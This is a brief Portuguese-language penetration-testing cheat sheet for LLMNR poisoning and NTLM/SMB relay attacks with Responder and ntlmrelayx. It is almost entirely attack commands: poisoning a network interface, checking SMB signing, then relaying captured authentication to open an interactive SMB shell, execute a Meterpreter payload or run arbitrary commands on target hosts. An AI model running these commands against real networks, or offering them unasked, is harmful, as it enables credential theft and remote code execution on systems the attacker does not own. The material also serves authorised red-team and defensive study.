Responder

Responder

• Envenenamento por LMNR

responder -I eth0 -A -v

• Relé SMB

nmap --script=smb2-security-mode -p445

• Ataques de resposta

  • http off smb off em responder.conf

• Ataque 1

responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support

• Ataque 2

responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support -i # It will show SMB shell opned on port {PORT}
nc 127.0.0.1 {PORT}

Comando SHELL shares para obter o nome das ações e use SHARENAME$ para obter acesso.

• Ataque 3

responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support -e meterpreterShell.exe

• Ataque 4

responder -I eth0 -rdwv
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"